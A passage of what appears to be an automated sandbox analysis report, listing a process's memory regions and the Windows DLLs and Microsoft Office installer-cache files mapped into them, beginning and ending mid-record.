filename = "" Region: id = 854 start_va = 0x3190000 end_va = 0x31cffff entry_point = 0x0 region_type = private name = "private_0x0000000003190000" filename = "" Region: id = 855 start_va = 0x746d0000 end_va = 0x746e3fff entry_point = 0x746d0000 region_type = mapped_file name = "ntlanman.dll" filename = "\\Windows\\SysWOW64\\ntlanman.dll" (normalized: "c:\\windows\\syswow64\\ntlanman.dll") Region: id = 856 start_va = 0x7ef9b000 end_va = 0x7ef9dfff entry_point = 0x0 region_type = private name = "private_0x000000007ef9b000" filename = "" Region: id = 857 start_va = 0x3150000 end_va = 0x318ffff entry_point = 0x0 region_type = private name = "private_0x0000000003150000" filename = "" Region: id = 858 start_va = 0x3200000 end_va = 0x323ffff entry_point = 0x0 region_type = private name = "private_0x0000000003200000" filename = "" Region: id = 859 start_va = 0x746b0000 end_va = 0x746c6fff entry_point = 0x746b0000 region_type = mapped_file name = "davclnt.dll" filename = "\\Windows\\SysWOW64\\davclnt.dll" (normalized: "c:\\windows\\syswow64\\davclnt.dll") Region: id = 860 start_va = 0x7ef98000 end_va = 0x7ef9afff entry_point = 0x0 region_type = private name = "private_0x000000007ef98000" filename = "" Region: id = 861 start_va = 0x74810000 end_va = 0x74817fff entry_point = 0x74810000 region_type = mapped_file name = "davhlpr.dll" filename = "\\Windows\\SysWOW64\\davhlpr.dll" (normalized: "c:\\windows\\syswow64\\davhlpr.dll") Region: id = 862 start_va = 0xa0000 end_va = 0xaffff entry_point = 0xa0000 region_type = mapped_file name = "excellr.cab" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab") Region: id = 863 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "excellr.cab" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab") Region: id = 864 start_va = 0x2a20000 end_va = 0x2a5ffff entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 865 start_va = 0x4240000 end_va = 0x427ffff entry_point = 0x0 region_type = private name = "private_0x0000000004240000" filename = "" Region: id = 866 start_va = 0x7ef95000 end_va = 0x7ef97fff entry_point = 0x0 region_type = private name = "private_0x000000007ef95000" filename = "" Region: id = 867 start_va = 0xa0000 end_va = 0xaffff entry_point = 0xa0000 region_type = mapped_file name = "excellr.cab" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excellr.cab") Region: id = 868 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "excelmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml") Region: id = 869 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "excelmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml") Region: id = 870 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "excelmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\ExcelMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\excelmui.xml") Region: id = 871 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 872 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 873 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0016-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0016-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 874 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "powerpointmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml") Region: id = 875 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "powerpointmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml") Region: id = 876 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "powerpointmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.xml") Region: id = 877 start_va = 0xa0000 end_va = 0xaafff entry_point = 0xa0000 region_type = mapped_file name = "pptlr.cab" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab") Region: id = 878 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "pptlr.cab" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab") Region: id = 879 start_va = 0xa0000 end_va = 0xaafff entry_point = 0xa0000 region_type = mapped_file name = "pptlr.cab" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PptLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\pptlr.cab") Region: id = 880 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 881 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 882 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 883 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "publishermui.xml" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml") Region: id = 884 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "publishermui.xml" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml") Region: id = 885 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "publishermui.xml" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PublisherMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publishermui.xml") Region: id = 886 start_va = 0xa0000 end_va = 0xaffff entry_point = 0xa0000 region_type = mapped_file name = "publr.cab" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab") Region: id = 887 start_va = 0x3240000 end_va = 0x3bbffff entry_point = 0x3240000 region_type = mapped_file name = "publr.cab" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab") Region: id = 888 start_va = 0xa0000 end_va = 0xaffff entry_point = 0xa0000 region_type = mapped_file name = "publr.cab" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\PubLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\publr.cab") Region: id = 889 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 890 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 891 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0019-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0019-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 892 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "outlklr.cab" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab") Region: id = 893 start_va = 0x3240000 end_va = 0x4061fff entry_point = 0x3240000 region_type = mapped_file name = "outlklr.cab" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab") Region: id = 894 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "outlklr.cab" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlkLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlklr.cab") Region: id = 895 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "outlookmui.xml" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml") Region: id = 896 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "outlookmui.xml" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml") Region: id = 897 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "outlookmui.xml" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\OutlookMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\outlookmui.xml") Region: id = 898 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 899 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 900 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-001A-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001a-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 901 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 902 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 903 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 904 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0xa0000 region_type = mapped_file name = "wordlr.cab" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab") Region: id = 905 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "wordlr.cab" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab") Region: id = 972 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0xa0000 region_type = mapped_file name = "wordlr.cab" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordlr.cab") Region: id = 973 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "wordmui.xml" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml") Region: id = 974 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "wordmui.xml" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml") Region: id = 975 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "wordmui.xml" filename = "\\MSOCache\\All Users\\{90140000-001B-0409-1000-0000000FF1CE}-C\\WordMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-001b-0409-1000-0000000ff1ce}-c\\wordmui.xml") Region: id = 976 start_va = 0xa0000 end_va = 0xa3fff entry_point = 0xa0000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab") Region: id = 977 start_va = 0x3240000 end_va = 0x3d33fff entry_point = 0x3240000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab") Region: id = 978 start_va = 0xa0000 end_va = 0xa3fff entry_point = 0xa0000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.cab") Region: id = 979 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml") Region: id = 980 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml") Region: id = 981 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.en\\proof.xml") Region: id = 982 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab") Region: id = 983 start_va = 0x3240000 end_va = 0x3f42fff entry_point = 0x3240000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab") Region: id = 984 start_va = 0xa0000 end_va = 0xa2fff entry_point = 0xa0000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.cab") Region: id = 985 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml") Region: id = 986 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml") Region: id = 987 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.es\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.es\\proof.xml") Region: id = 988 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0xa0000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab") Region: id = 989 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab") Region: id = 990 start_va = 0xa0000 end_va = 0xa6fff entry_point = 0xa0000 region_type = mapped_file name = "proof.cab" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.cab") Region: id = 991 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml") Region: id = 992 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml") Region: id = 993 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proof.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proof.fr\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proof.fr\\proof.xml") Region: id = 994 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proofing.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml") Region: id = 995 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proofing.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml") Region: id = 996 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "proofing.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Proofing.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\proofing.xml") Region: id = 997 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 998 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 999 start_va = 0xa0000 end_va = 0xa1fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-002C-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1000 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "office32mui.xml" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml") Region: id = 1001 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "office32mui.xml" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml") Region: id = 1002 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "office32mui.xml" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Office32MUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\office32mui.xml") Region: id = 1003 start_va = 0xa0000 end_va = 0xabfff entry_point = 0xa0000 region_type = mapped_file name = "owow32lr.cab" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab") Region: id = 1004 start_va = 0x3240000 end_va = 0x350bfff entry_point = 0x3240000 region_type = mapped_file name = "owow32lr.cab" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab") Region: id = 1005 start_va = 0xa0000 end_va = 0xabfff entry_point = 0xa0000 region_type = mapped_file name = "owow32lr.cab" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\OWOW32LR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\owow32lr.cab") Region: id = 1006 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1007 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1008 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "setup.xml" filename = "\\MSOCache\\All Users\\{90140000-0043-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0043-0409-1000-0000000ff1ce}-c\\setup.xml") Region: id = 1009 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "inflr.cab" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab") Region: id = 1010 start_va = 0x3240000 end_va = 0x423ffff entry_point = 0x3240000 region_type = mapped_file name = "inflr.cab" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab") Region: id = 1011 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "inflr.cab" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\inflr.cab") Region: id = 1012 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "infopathmui.xml" filename = "\\MSOCache\\All Users\\{90140000-0044-0409-1000-0000000FF1CE}-C\\InfoPathMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0044-0409-1000-0000000ff1ce}-c\\infopathmui.xml") Region: id = 1013 start_va = 0xa0000 end_va = 0xa0fff entry_point = 0xa0000 region_type = mapped_file name = "infopathmui.xml" filename = "\\MSOCache\\All 